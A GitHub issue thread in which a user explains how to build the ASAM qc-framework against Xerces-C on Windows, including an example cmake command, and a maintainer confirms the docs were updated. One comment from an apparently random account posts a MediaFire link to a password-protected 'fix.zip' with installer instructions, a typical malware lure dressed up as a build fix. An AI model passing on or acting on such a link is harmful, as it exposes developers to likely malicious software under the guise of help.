### ISSUE TITLE
Problems building qc-framework regarding xerces-c dependency

### ISSUE THREAD

**Issue by WeChri** [asam-ev/qc-framework#142]
Hello,

I had problems building the qc-framework, which I could now fix with the appreciated help I got in the biweekly qc-framework meeting today. As discussed in the meeting I open up this issue to explain the problemsolving, to maybe also help others or to discuss, if and how we should update the build instructions:

### Building Xerces-C
For Xercex-C it is important to have the Release version build. To be sure you can check the lib folder in the xercex-c build root for _xerces-c_3.lib_. This exact library is necessary to build the framework.

### Linking Xerces-C
To link it correctly, add 
_-DXercesC_ROOT="xerces-c-root"_
to the cmake config command*

after building the qc-framework, you have to manually copy the _xerces-c_3_2.dll_ to the bin folder next to the .exe-files.

*example:
cmake -G "Visual Studio 16 2019" -A "x64" -T "v142" -B..\build -S. ^
-DCMAKE_INSTALL_PREFIX="D:\LocalRepos_CW\qc-framework\build" ^
-DENABLE_FUNCTIONAL_TESTS=OFF -DASAM_OPENDRIVE_XSD_DIR="../odr_xsd" ^
-DASAM_OPENSCENARIO_XSD_DIR="../osc_xsd" -DQt5_ROOT="C:\Qt\5.15.2\msvc2019_64" ^
-DXercesC_ROOT="C:\Program Files (x86)\xerces-c"
(adjust the paths correctly for your machine)

Thanks for the help!

Kind regards,
Christoph Weber (3DMS)

@hoangtungdinh @andreaskern74

**Comment by Qsgz2023ji5ban** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by hoangtungdinh** [comment]
Thanks a lot @WeChri  for identifying the issue. We updated the installation guide documentation with the remarks you mentioned.
